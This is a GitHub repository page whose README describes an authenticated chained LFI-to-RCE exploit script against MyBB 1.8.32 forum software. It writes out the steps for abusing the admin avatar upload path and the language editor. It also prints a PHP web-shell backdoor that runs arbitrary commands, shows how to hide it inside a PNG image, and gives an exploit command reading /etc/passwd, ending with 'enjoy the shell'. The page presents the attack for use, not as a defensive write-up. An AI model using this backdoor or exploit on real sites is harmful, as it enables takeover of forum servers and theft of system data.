Skip to content

MyBB 1.8.32 - Chained LFI Remote Code Execution (RCE) (Authenticated) python exploit script...

Notifications You must be signed in to change notification settings

FDlucifer/mybb_1832_LFI_RCE

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

MyBB 1.8.32 - Chained LFI Remote Code Execution (RCE) (Authenticated)

(1). An RCE can be obtained on MyBB's Admin CP in Configuration -> Profile Options -> Avatar Upload Path. to change Avatar Upload Path to /inc to bypass blacklist upload dir.

(2). after doing that, then we are able to chain in "admin avatar upload" page: http://www.mybb1832.cn/admin/index.php?module=user-users&action=edit&uid=1#tab_avatar, and LFI in "Edit Language Variables" page: http://www.mybb1832.cn/admin/index.php?module=config-languages&action=edit&lang=english.

(3). This chained bugs can lead to Authenticated RCE. (note). The user must have rights to add or update settings and update Avatar. This is tested on MyBB 1.8.32.

Exp Usage:

  1. first choose a png file that size less than 1kb
  2. then merge the png file with a php simple backdoor file using the following commands
mac@xxx-2 php-backdoor % cat simple-backdoor.php 
<?php
if(isset($_REQUEST['cmd'])){
        echo "<getshell success>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "<getshell success>";
        phpinfo();
}
?>
mac@xxx-2 php-backdoor % ls     
simple-backdoor.php     test.png
mac@xxx-2 php-backdoor % cat simple-backdoor.php >> test.png 
mac@xxx-2 php-backdoor % file test.png 
test.png: PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
  1. finally run the following commands to run the exp script to get RCE output! enjoy the shell...
python3 exp.py --host http://www.xxx.cn --username admin --password xxx --email [email protected] --file avatar_1.png --cmd "cat /etc/passwd"

reference

About

MyBB 1.8.32 - Chained LFI Remote Code Execution (RCE) (Authenticated) python exploit script...

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published